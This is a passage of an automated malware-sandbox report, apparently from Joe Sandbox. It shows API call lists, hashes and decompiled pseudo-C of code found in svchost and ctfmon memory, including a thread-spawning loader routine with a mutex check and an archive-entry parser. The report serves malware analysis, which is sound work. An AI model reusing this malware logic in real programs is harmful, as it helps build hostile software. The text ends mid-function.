                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,03997F07,00000000,00000000,?,039A4F18,03997F07,00000000,00000000,00000000,?,039A5183,00000006,FlsSetValue), ref: 039A4FA3
                                                • GetLastError.KERNEL32(?,039A4F18,03997F07,00000000,00000000,00000000,?,039A5183,00000006,FlsSetValue,039B9164,039B916C,00000000,00000364,?,039A5FB4), ref: 039A4FAF
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,039A4F18,03997F07,00000000,00000000,00000000,?,039A5183,00000006,FlsSetValue,039B9164,039B916C,00000000), ref: 039A4FBD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: dce4a34d454c8452541d3240ea609670b294a150773cf494c588e7a6be0fec16
                                                • Instruction ID: 619695f85fe33e60b151d058fff183dc7fe6cb398dd0a8ca4986586cdcec7824
                                                • Opcode Fuzzy Hash: dce4a34d454c8452541d3240ea609670b294a150773cf494c588e7a6be0fec16
                                                • Instruction Fuzzy Hash: A0017B36609A329BCB20DA6FAC04E777B9CEF097E17140B20F906EB341E760D400CAE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4a45a8b47b19f59e2bd87932a2e1d2c03182355c1adcf0de4aa0dfe7951f195
                                                • Instruction ID: 3871008c217b02aeec52d28cb0addc692e0c33c424fe1760bfa0a85ef1c59289
                                                • Opcode Fuzzy Hash: d4a45a8b47b19f59e2bd87932a2e1d2c03182355c1adcf0de4aa0dfe7951f195
                                                • Instruction Fuzzy Hash: 23F05CBB5007070AFE28F3FC8941B6E729C2E501E8B1C077FE42ACE190FB21D45581AA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,039AF490,?,00000050,?,?,?,?,?), ref: 039AF310
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ACP$OCP
                                                • API String ID: 0-711371036
                                                • Opcode ID: 0a2d644652813c842525d100ca534cfea67873924b4c4c9fbf19573b9ae860d4
                                                • Instruction ID: 8c1c879685bb0128bdd9063d7ed4eadc027c39d6d85f9534da41fa22fe58d10b
                                                • Opcode Fuzzy Hash: 0a2d644652813c842525d100ca534cfea67873924b4c4c9fbf19573b9ae860d4
                                                • Instruction Fuzzy Hash: 7121956AA00900A6DB34CAAD9D0579B72AE9B54BD4B5A4764DD07D7104F732D900C3D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 03998FFC
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0399900A
                                                  • Part of subcall function 0399C8FB: RaiseException.KERNEL32(?,?,?,03998FCF,73B75870,73B76490,73BCF7E0,?,?,?,?,?,03998FCF,?,039BE8EC), ref: 0399C95A
                                                Strings
                                                • invalid random_device value, xrefs: 03999029
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionException@8RaiseThrowstd::invalid_argument::invalid_argument
                                                • String ID: invalid random_device value
                                                • API String ID: 4038826145-3926945683
                                                • Opcode ID: f2c1232e66005123f2f9aa0d28e705e9e8f071f008cc27e94514388cbb6e27c4
                                                • Instruction ID: e120c5d34445f980b6a19ee1ca2b443e9903ee68afaf390b8a8b21b63eab0df4
                                                • Opcode Fuzzy Hash: f2c1232e66005123f2f9aa0d28e705e9e8f071f008cc27e94514388cbb6e27c4
                                                • Instruction Fuzzy Hash: E6E0C26D80430C7ADF04F7FDDD01CCD777C8A85100B40446AEA20E6441EB70AA0886E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,5AA1B1C2,00000000,00000000,00000000,00000000,03995F94,03995F94,00000000,00000000,00000000,5AA1B1C2,00000000), ref: 039A97DF
                                                • GetLastError.KERNEL32 ref: 039A97ED
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,5AA1B1C2,00000000), ref: 039A9848
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: a226b8183e6c43b332c163e716ac62d58d9b4f91afdad2d859c477c514ff7e00
                                                • Instruction ID: dd50f3d9b7ce144dc011468680ecab24026574837f67be0611acbd27443535e8
                                                • Opcode Fuzzy Hash: a226b8183e6c43b332c163e716ac62d58d9b4f91afdad2d859c477c514ff7e00
                                                • Instruction Fuzzy Hash: 9641E935A04A0AAFDF25DF6DC844A7ABBBCFF41350F1943A9E8599B191DB318901C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD54F00(intOrPtr _a4, void** _a8, long* _a12) {
                                                				void* __edi;
                                                				intOrPtr _t18;
                                                				long _t20;
                                                				void* _t21;
                                                				intOrPtr _t23;
                                                				intOrPtr _t26;
                                                				intOrPtr* _t30;
                                                				intOrPtr _t31;
                                                				intOrPtr _t32;
                                                				intOrPtr _t33;
                                                				intOrPtr _t34;
                                                				intOrPtr _t35;
                                                				signed int _t37;
                                                
                                                				EnterCriticalSection(0x6fd6ac54);
                                                				_t18 =  *0x6fd6ac70; // 0x6
                                                				_t37 = 0;
                                                				if(_t18 == 0) {
                                                					L6:
                                                					LeaveCriticalSection(0x6fd6ac54);
                                                					return 0;
                                                				} else {
                                                					_t35 = _a4;
                                                					_t34 =  *0x6fd6ac6c; // 0x30300a8
                                                					while(1) {
                                                						_t30 = 0;
                                                						if(_t37 < _t18) {
                                                							_t30 =  *((intOrPtr*)(_t34 + _t37 * 4));
                                                						}
                                                						if( *_t30 == _t35) {
                                                							break;
                                                						}
                                                						_t37 = _t37 + 1;
                                                						if(_t37 < _t18) {
                                                							continue;
                                                						} else {
                                                							goto L6;
                                                						}
                                                						goto L18;
                                                					}
                                                					_t31 = 0;
                                                					__eflags = _t37 - _t18;
                                                					if(_t37 < _t18) {
                                                						_t31 =  *((intOrPtr*)(_t34 + _t37 * 4));
                                                					}
                                                					__eflags =  *((intOrPtr*)(_t31 + 8));
                                                					if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                						goto L6;
                                                					} else {
                                                						_t32 = 0;
                                                						__eflags = _t37 - _t18;
                                                						if(_t37 < _t18) {
                                                							_t32 =  *((intOrPtr*)(_t34 + _t37 * 4));
                                                						}
                                                						__eflags =  *((intOrPtr*)(_t32 + 4));
                                                						if( *((intOrPtr*)(_t32 + 4)) <= 0) {
                                                							goto L6;
                                                						} else {
                                                							_t33 = 0;
                                                							__eflags = _t37 - _t18;
                                                							if(_t37 < _t18) {
                                                								_t33 =  *((intOrPtr*)(_t34 + _t37 * 4));
                                                							}
                                                							_t20 =  *(_t33 + 4);
                                                							_t36 = _a12;
                                                							 *_a12 = _t20;
                                                							_t21 = LocalAlloc(0x40, _t20);
                                                							_t28 = _a8;
                                                							 *_a8 = _t21;
                                                							E6FD57920(_a12, _t21, 0,  *_t36);
                                                							_t23 = 0;
                                                							__eflags = _t37 -  *0x6fd6ac70; // 0x6
                                                							if(__eflags < 0) {
                                                								_t26 =  *0x6fd6ac6c; // 0x30300a8
                                                								_t23 =  *((intOrPtr*)(_t26 + _t37 * 4));
                                                							}
                                                							E6FD5FDE0( *_t28,  *((intOrPtr*)(_t23 + 8)),  *_t36);
                                                							LeaveCriticalSection(0x6fd6ac54);
                                                							return 1;
                                                						}
                                                					}
                                                				}
                                                				L18:
                                                			}

















                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC54), ref: 6FD54F0A
                                                • LeaveCriticalSection.KERNEL32(6FD6AC54), ref: 6FD54F3B
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 6FD54F7C
                                                • LeaveCriticalSection.KERNEL32(6FD6AC54), ref: 6FD54FBA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$AllocEnterLocal
                                                • String ID:
                                                • API String ID: 1168746000-0
                                                • Opcode ID: 4703906efb4f7ce67b7fe28db45f82afcb91c0e3c59926f70af82b45ace494d6
                                                • Instruction ID: a3e539a36a34d2ed79f23417d3745c2e0bd0989cac58fcfa8cf076334f98c9f9
                                                • Opcode Fuzzy Hash: 4703906efb4f7ce67b7fe28db45f82afcb91c0e3c59926f70af82b45ace494d6
                                                • Instruction Fuzzy Hash: 9321F535200221DFDF609F68D494EADB7A1FF463A5F054166E8468B140E732F872DBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E009693E0(void* __eflags) {
                                                				void* _t3;
                                                				long _t15;
                                                
                                                				FreeConsole();
                                                				SetUnhandledExceptionFilter(E00969300); // executed
                                                				_t3 = E00969310(); // executed
                                                				if(_t3 != 0) {
                                                					Sleep(0xbb8); // executed
                                                					CreateThread(0, 0, E0096AFC0, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E00966D40, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E0096B470, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E00967C20, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E00965200, 0, 0, 0); // executed
                                                					_t15 = GetTickCount();
                                                					if(GetTickCount() - _t15 >= 0xa4cb80) {
                                                						L4:
                                                						ExitProcess(0);
                                                					} else {
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						Sleep(0xea60); // executed
                                                					} while (GetTickCount() - _t15 < 0xa4cb80);
                                                					goto L4;
                                                				}
                                                				return 0;
                                                			}






                                                APIs
                                                • FreeConsole.KERNEL32 ref: 009693E3
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009300), ref: 009693EE
                                                  • Part of subcall function 00969310: WSAStartup.WS2_32(00000202,?), ref: 00969335
                                                  • Part of subcall function 00969310: CreateMutexA.KERNELBASE ref: 0096937F
                                                  • Part of subcall function 00969310: GetLastError.KERNEL32 ref: 00969387
                                                  • Part of subcall function 00969310: ReleaseMutex.KERNEL32(00000000), ref: 0096939E
                                                  • Part of subcall function 00969310: CloseHandle.KERNEL32(00000000), ref: 009693A5
                                                • Sleep.KERNELBASE(00000BB8), ref: 0096940E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000AFC0,00000000,00000000,00000000), ref: 00969425
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00006D40,00000000,00000000,00000000), ref: 00969436
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000B470,00000000,00000000,00000000), ref: 00969447
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00007C20,00000000,00000000,00000000), ref: 00969458
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005200,00000000,00000000,00000000), ref: 00969469
                                                • GetTickCount.KERNEL32 ref: 00969471
                                                • GetTickCount.KERNEL32 ref: 00969475
                                                • Sleep.KERNELBASE(0000EA60), ref: 00969485
                                                • GetTickCount.KERNEL32 ref: 00969487
                                                • ExitProcess.KERNEL32 ref: 00969494
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Create$Thread$CountTick$MutexSleep$CloseConsoleErrorExceptionExitFilterFreeHandleLastProcessReleaseStartupUnhandled
                                                • String ID:
                                                • API String ID: 4116069078-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0096F4E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int _a4, void* _a8) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v540;
                                                				unsigned int _v568;
                                                				signed int _v592;
                                                				signed int _v596;
                                                				unsigned int _v604;
                                                				unsigned int _v620;
                                                				struct _FILETIME _v628;
                                                				struct _FILETIME _v636;
                                                				intOrPtr* _v640;
                                                				signed int _v644;
                                                				signed int _v648;
                                                				signed int _v652;
                                                				signed int _v656;
                                                				char _v658;
                                                				char _v659;
                                                				signed int _v660;
                                                				signed int _v664;
                                                				void* __esi;
                                                				signed int _t195;
                                                				signed int _t199;
                                                				signed int _t204;
                                                				signed int _t205;
                                                				signed int _t208;
                                                				void* _t209;
                                                				signed int _t212;
                                                				signed int _t213;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t216;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t223;
                                                				signed int _t235;
                                                				signed int _t244;
                                                				signed int _t250;
                                                				signed int _t253;
                                                				signed int _t254;
                                                				signed char _t255;
                                                				signed int _t262;
                                                				signed int _t264;
                                                				signed int _t270;
                                                				signed int _t271;
                                                				signed int _t273;
                                                				signed int _t279;
                                                				signed int _t280;
                                                				signed int _t282;
                                                				signed int _t289;
                                                				signed int _t294;
                                                				signed int _t296;
                                                				void* _t307;
                                                				signed int _t312;
                                                				signed int _t319;
                                                				signed int _t328;
                                                				signed int _t330;
                                                				signed char _t334;
                                                				long _t338;
                                                				signed int _t339;
                                                				intOrPtr* _t345;
                                                				signed int _t348;
                                                				signed int _t356;
                                                				signed int _t361;
                                                				unsigned int _t380;
                                                				unsigned int _t382;
                                                				void* _t383;
                                                				signed int _t384;
                                                				signed int _t385;
                                                				signed int _t390;
                                                				intOrPtr _t392;
                                                				signed int* _t395;
                                                				signed int _t409;
                                                				void* _t410;
                                                				void* _t411;
                                                				intOrPtr* _t413;
                                                				void* _t414;
                                                				void* _t416;
                                                				void* _t417;
                                                				void* _t418;
                                                				void* _t419;
                                                				void* _t421;
                                                				signed int _t422;
                                                				signed int _t424;
                                                				signed int _t427;
                                                				signed int _t428;
                                                				void* _t430;
                                                
                                                				_t424 = (_t422 & 0xfffffff8) - 0x294;
                                                				_t195 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t195 ^ _t424;
                                                				_t307 = _a8;
                                                				_t409 = _a4;
                                                				_v652 = _t307;
                                                				_t395 = __ecx;
                                                				_v640 = __ecx;
                                                				if(_t409 < 0xffffffff) {
                                                					L81:
                                                					_pop(_t410);
                                                					__eflags = _v8 ^ _t424;
                                                					return E00970A5D(_v8 ^ _t424, _t410);
                                                				} else {
                                                					_t318 =  *__ecx;
                                                					if(_t409 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                						goto L81;
                                                					} else {
                                                						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                							E0096F2D0(_t318, __edx);
                                                						}
                                                						_t395[1] = 0xffffffff;
                                                						if(_t409 != _t395[0x4d]) {
                                                							__eflags = _t409 - 0xffffffff;
                                                							if(_t409 != 0xffffffff) {
                                                								_t319 =  *_t395;
                                                								__eflags = _t409 -  *((intOrPtr*)(_t319 + 0x10));
                                                								if(_t409 <  *((intOrPtr*)(_t319 + 0x10))) {
                                                									E0096EC60(_t319);
                                                								}
                                                								_t199 =  *_t395;
                                                								__eflags =  *((intOrPtr*)(_t199 + 0x10)) - _t409;
                                                								if( *((intOrPtr*)(_t199 + 0x10)) < _t409) {
                                                									_t312 = _t409;
                                                									do {
                                                										_t409 =  *_t395;
                                                										__eflags = _t409;
                                                										if(_t409 != 0) {
                                                											__eflags =  *(_t409 + 0x18);
                                                											if( *(_t409 + 0x18) != 0) {
                                                												_t392 =  *((intOrPtr*)(_t409 + 0x10)) + 1;
                                                												__eflags = _t392 -  *((intOrPtr*)(_t409 + 4));
                                                												if(_t392 !=  *((intOrPtr*)(_t409 + 4))) {
                                                													 *((intOrPtr*)(_t409 + 0x10)) = _t392;
                                                													 *((intOrPtr*)(_t409 + 0x14)) =  *((intOrPtr*)(_t409 + 0x14)) +  *((intOrPtr*)(_t409 + 0x48)) + 0x2e +  *((intOrPtr*)(_t409 + 0x50)) +  *((intOrPtr*)(_t409 + 0x4c));
                                                													_t294 = E0096E7C0(_t409, _t409 + 0x28, _t409 + 0x78, 0, 0); // executed
                                                													_t424 = _t424 - 0x10 + 0x1c;
                                                													asm("sbb eax, eax");
                                                													_t296 =  ~_t294 + 1;
                                                													__eflags = _t296;
                                                													 *(_t409 + 0x18) = _t296;
                                                												}
                                                											}
                                                										}
                                                										_t289 =  *_t395;
                                                										__eflags =  *((intOrPtr*)(_t289 + 0x10)) - _t312;
                                                									} while ( *((intOrPtr*)(_t289 + 0x10)) < _t312);
                                                									_t307 = _v652;
                                                								}
                                                								E0096E7C0( *_t395,  &_v620, 0,  &_v540, 0x104); // executed
                                                								_t204 = E0096ECA0( *_t395,  &_v648, __eflags,  &_v652,  &_v664); // executed
                                                								_t427 = _t424 - 0x10 + 0x24;
                                                								__eflags = _t204;
                                                								if(_t204 == 0) {
                                                									_t205 = E0096E170( *( *_t395), _v652, 0); // executed
                                                									_t428 = _t427 + 4;
                                                									__eflags = _t205;
                                                									if(__eflags != 0) {
                                                										L24:
                                                										_pop(_t411);
                                                										__eflags = _v8 ^ _t428;
                                                										return E00970A5D(_v8 ^ _t428, _t411);
                                                									} else {
                                                										_push(_v664);
                                                										_t208 = E00970AB4(_t409, __eflags);
                                                										_t412 = _t208;
                                                										_v656 = _t208;
                                                										_t209 = E0096E200(_t208, 1, _v664,  *( *_t395));
                                                										_t430 = _t428 + 0xc;
                                                										__eflags = _t209 - _v664;
                                                										if(_t209 == _v664) {
                                                											_t328 = 0;
                                                											__eflags = 0;
                                                											 *_t307 =  *( *_t395 + 0x10);
                                                											do {
                                                												_t212 =  *((intOrPtr*)(_t430 + _t328 + 0x88));
                                                												_t328 = _t328 + 1;
                                                												 *((char*)(_t430 + _t328 + 0x18f)) = _t212;
                                                												__eflags = _t212;
                                                											} while (_t212 != 0);
                                                											_t413 =  &_v276;
                                                											while(1) {
                                                												_t213 =  *_t413;
                                                												__eflags = _t213;
                                                												if(_t213 == 0) {
                                                													goto L31;
                                                												}
                                                												L29:
                                                												__eflags =  *((char*)(_t413 + 1)) - 0x3a;
                                                												if( *((char*)(_t413 + 1)) == 0x3a) {
                                                													_t413 = _t413 + 2;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												L31:
                                                												__eflags = _t213 - 0x5c;
                                                												if(_t213 == 0x5c) {
                                                													_t413 = _t413 + 1;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												__eflags = _t213 - 0x2f;
                                                												if(_t213 == 0x2f) {
                                                													_t413 = _t413 + 1;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t214 = E00975FFF(_t413, "\\..\\");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t214;
                                                												if(_t214 != 0) {
                                                													_t61 = _t214 + 4; // 0x4
                                                													_t413 = _t61;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t215 = E00975FFF(_t413, "\\../");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t215;
                                                												if(_t215 != 0) {
                                                													_t62 = _t215 + 4; // 0x4
                                                													_t413 = _t62;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t216 = E00975FFF(_t413, "/../");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t216;
                                                												if(_t216 != 0) {
                                                													_t63 = _t216 + 4; // 0x4
                                                													_t413 = _t63;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                													goto L31;
                                                												}
                                                												_t217 = E00975FFF(_t413, "/..\\");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t217;
                                                												if(_t217 != 0) {
                                                													_t64 = _t217 + 4; // 0x4
                                                													_t413 = _t64;
                                                													continue;
                                                												}
                                                												_t65 = _t307 + 4; // 0x965092
                                                												_t330 = _t65 - _t413;
                                                												__eflags = _t330;
                                                												do {
                                                													_t218 =  *_t413;
                                                													_t413 = _t413 + 1;
                                                													 *((char*)(_t330 + _t413 - 1)) = _t218;
                                                													__eflags = _t218;
                                                												} while (_t218 != 0);
                                                												_t380 = _v568;
                                                												_v660 = _t380 >> 0x0000001e & 0xffffff01;
                                                												_t334 =  !(_t380 >> 0x17) & 0x00000001;
                                                												_t223 = _v620 >> 8;
                                                												_v648 = 0;
                                                												_v652 = 0;
                                                												_v644 = 1;
                                                												__eflags = _t223;
                                                												if(_t223 == 0) {
                                                													L49:
                                                													_t334 = _t380 & 0x00000001;
                                                													_v648 = _t380 >> 0x00000001 & 0xffffff01;
                                                													_v652 = _t380 >> 0x00000002 & 0xffffff01;
                                                													_v660 = _t380 >> 0x00000004 & 0x00000001;
                                                													_t235 = _t380 >> 0x00000005 & 0xffffff01;
                                                													__eflags = _t235;
                                                													_v644 = _t235;
                                                												} else {
                                                													__eflags = _t223 - 7;
                                                													if(_t223 == 7) {
                                                														goto L49;
                                                													} else {
                                                														__eflags = _t223 - 0xb;
                                                														if(_t223 == 0xb) {
                                                															goto L49;
                                                														} else {
                                                															__eflags = _t223 - 0xe;
                                                															if(_t223 == 0xe) {
                                                																goto L49;
                                                															}
                                                														}
                                                													}
                                                												}
                                                												__eflags = _v660;
                                                												_t237 = (_v660 != 0) ? 0x10 : 0; // operand dropped by the decompiler; restored from the preceding flags test on _v660
                                                												__eflags = _v644;
                                                												 *(_t307 + 0x108) = _t237;
                                                												if(_v644 != 0) {
                                                													_t82 = _t307 + 0x108;
                                                													 *_t82 =  *(_t307 + 0x108) | 0x00000020;
                                                													__eflags =  *_t82;
                                                												}
                                                												__eflags = _v648;
                                                												if(_v648 != 0) {
                                                													_t85 = _t307 + 0x108;
                                                													 *_t85 =  *(_t307 + 0x108) | 0x00000002;
                                                													__eflags =  *_t85;
                                                												}
                                                												__eflags = _t334;
                                                												if(_t334 != 0) {
                                                													_t87 = _t307 + 0x108;
                                                													 *_t87 =  *(_t307 + 0x108) | 0x00000001;
                                                													__eflags =  *_t87;
                                                												}
                                                												__eflags = _v652;
                                                												if(_v652 != 0) {
                                                													_t90 = _t307 + 0x108;
                                                													 *_t90 =  *(_t307 + 0x108) | 0x00000004;
                                                													__eflags =  *_t90;
                                                												}
                                                												_t382 = _v604;
                                                												 *(_t307 + 0x124) = _v596;
                                                												 *(_t307 + 0x128) = _v592;
                                                												_v636.dwLowDateTime = E0096F350(_t382 >> 0x10, _t382);
                                                												_v636.dwHighDateTime = _t382;
                                                												LocalFileTimeToFileTime( &_v636,  &_v628);
                                                												_t338 = _v628.dwLowDateTime;
                                                												_t414 = 0;
                                                												__eflags = _v664 - 4;
                                                												_t244 = _v628.dwHighDateTime;
                                                												 *(_t307 + 0x10c) = _t338;
                                                												 *(_t307 + 0x110) = _t244;
                                                												 *(_t307 + 0x114) = _t338;
                                                												 *(_t307 + 0x118) = _t244;
                                                												 *(_t307 + 0x11c) = _t338;
                                                												 *(_t307 + 0x120) = _t244;
                                                												if(_v664 <= 4) {
                                                													L77:
                                                													_t339 = _v656;
                                                												} else {
                                                													_t250 = _v656;
                                                													_v658 = 0;
                                                													_t383 = _t250 + 1;
                                                													while(1) {
                                                														L61:
                                                														_t345 = "UT";
                                                														_v660 =  *(_t414 + _t250) & 0x000000ff;
                                                														_v659 =  *(_t383 + _t414) & 0x000000ff;
                                                														_t253 =  &_v660;
                                                														while(1) {
                                                															_t384 =  *_t253;
                                                															__eflags = _t384 -  *_t345;
                                                															if(_t384 !=  *_t345) {
                                                																break;
                                                															}
                                                															__eflags = _t384;
                                                															if(_t384 == 0) {
                                                																L66:
                                                																_t254 = 0;
                                                															} else {
                                                																_t390 =  *((intOrPtr*)(_t253 + 1));
                                                																_t120 = _t345 + 1; // 0x25000054
                                                																__eflags = _t390 -  *_t120;
                                                																if(_t390 !=  *_t120) {
                                                																	break;
                                                																} else {
                                                																	_t253 = _t253 + 2;
                                                																	_t345 = _t345 + 2;
                                                																	__eflags = _t390;
                                                																	if(_t390 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L66;
                                                																	}
                                                																}
                                                															}
                                                															L68:
                                                															__eflags = _t254;
                                                															if(_t254 == 0) {
                                                																_t385 = _v656;
                                                																_v660 = 0x989680;
                                                																_t255 =  *(_t414 + _t385 + 4) & 0x000000ff;
                                                																_t417 = _t414 + 5;
                                                																_v664 = _t255;
                                                																_v664 = _v664 >> 2;
                                                																_v664 = _v664 & 0x00000001;
                                                																_t348 = _t255 >> 0x00000001 & 0xffffff01;
                                                																_v652 = _t348;
                                                																__eflags = _t255 & 0x00000001;
                                                																if((_t255 & 0x00000001) != 0) {
                                                																	_t361 =  *(_t417 + _t385) & 0x000000ff;
                                                																	_t279 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
                                                																	_t417 = _t417 + 4;
                                                																	_t280 = _t279 | _t361;
                                                																	_t282 = _t280 * _v660 + 0xd53e8000;
                                                																	__eflags = _t282;
                                                																	 *(_t307 + 0x11c) = _t282;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x120) = _t280 * _v660 >> 0x20;
                                                																	_t385 = _v656;
                                                																	_t348 = _v652;
                                                																}
                                                																__eflags = _t348;
                                                																if(_t348 != 0) {
                                                																	_t356 =  *(_t417 + _t385) & 0x000000ff;
                                                																	_t270 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
                                                																	_t417 = _t417 + 4;
                                                																	_t271 = _t270 | _t356;
                                                																	_t273 = _t271 * _v660 + 0xd53e8000;
                                                																	__eflags = _t273;
                                                																	 *(_t307 + 0x10c) = _t273;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x110) = _t271 * _v660 >> 0x20;
                                                																}
                                                																__eflags = _v664;
                                                																if(_v664 != 0) {
                                                																	_t262 = ((( *(_t417 + _v656 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 1) & 0x000000ff) << 0x00000008 |  *(_t417 + _t386) & 0x000000ff;
                                                																	_t264 = _t262 * _v660 + 0xd53e8000;
                                                																	__eflags = _t264;
                                                																	 *(_t307 + 0x114) = _t264;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x118) = _t262 * _v660 >> 0x20;
                                                																}
                                                																goto L77;
                                                															} else {
                                                																_t339 = _v656;
                                                																_t383 = _t339 + 1;
                                                																_t414 = _t414 + ( *(_t414 + _t339 + 2) & 0x000000ff) + 4;
                                                																_t125 = _t414 + 4; // 0x4
                                                																__eflags = _t125 - _v664;
                                                																if(_t125 < _v664) {
                                                																	_t250 = _v656;
                                                																	goto L61;
                                                																} else {
                                                																}
                                                															}
                                                															goto L78;
                                                														}
                                                														asm("sbb eax, eax");
                                                														_t254 = _t253 | 0x00000001;
                                                														__eflags = _t254;
                                                														goto L68;
                                                													}
